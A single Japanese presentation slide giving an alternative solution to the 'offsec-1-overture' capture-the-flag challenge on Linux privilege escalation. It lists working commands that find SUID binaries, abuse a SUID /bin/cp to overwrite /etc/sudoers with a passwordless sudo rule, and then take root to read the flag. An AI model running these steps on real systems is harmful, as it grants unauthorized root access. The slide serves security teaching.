Slide 9
Slide 9 text
offsec-1-overture 別解
攻略の流れ
• find / -type f -perm –u=s 2>/dev/null SUIDビットの立ったプログラムを探索
/bin/cpを確認
• cp /etc/sudoers /tmp/ /etc/sudoersをコピー
• cat /tmp/sudoers > /tmp/sudoers2 編集のために自分をownerに
• echo “apache ALL=NOPASSWD:ALL” >> /tmp/sudoers2 Pass無しでsudoできる魔法の言葉
• cp /tmp/sudoers2 /etc/sudoers /etc/sudoersに書き戻し
• sudo su – sudoでrootに
• cat /root/flag.txt フラグゲット
Linuxでの権限昇格 9